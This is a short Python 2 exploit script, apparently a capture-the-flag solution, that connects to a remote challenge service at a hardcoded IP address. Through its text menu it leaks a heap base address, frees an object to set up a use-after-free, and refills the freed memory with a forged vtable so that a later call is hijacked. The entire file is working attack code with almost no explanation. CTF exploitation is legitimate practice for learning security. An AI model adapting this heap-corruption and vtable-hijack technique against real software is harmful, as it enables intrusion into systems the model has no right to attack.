gistfile1.py

import socket
import struct

is_local = False

if is_local:
    HOST = 'localhost'
    PORT = 50005
else:
    HOST = '54.218.22.41'
    PORT = 4766

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
sf = s.makefile()

def send(data):
    s.sendall(data + '\n')

def readline():
    return sf.readline()[:-1]

vtable = ''
vtable += struct.pack('I', 0x0804978c) #pond::gaze
vtable += struct.pack('I', 0x0804978c) #pond::gaze

blob_offset = 0x80 - 0x18
blob_size = 'UUUU'

first_sign = '\xff' * blob_offset + '\xff' * 8

readline()
readline()
readline()
readline()
readline()

# add pond
readline()
send('a')
readline()
send('p')
readline()
send('0')

#get base address
print '=========== Get base address ==========='
readline()
send('p')
readline()
send('0')
gazing = readline()
base_addr = int(gazing.split(' ')[-1], 16) - 8
print 'Base address:', hex(base_addr)

vtable_addr = base_addr + 0x80 + 0xc
print 'Virtual table addr:', hex(vtable_addr)
second_sign = struct.pack('I', vtable_addr) + vtable

# add first sign
print '=========== Add first sign ==========='
readline()
send('a')
readline()
send('s')
readline()
send('1')
readline()
send(first_sign)

# add person
print '=========== Add person ==========='
readline()
send('a')
readline()
send('e')
readline()
send('2')

# delete first sign
print '=========== Free first sign ==========='
readline()
send('d')
readline()
send('1')

# add exploit sign
print '=========== Add exploited sign ==========='
readline()
send('a')
readline()
send('s')
readline()
send('3')
readline()
send(second_sign)

# call exploited vtable
print '=========== Call person with Pond vtable ==========='
readline()
send('p')
readline()
send('2')
print readline()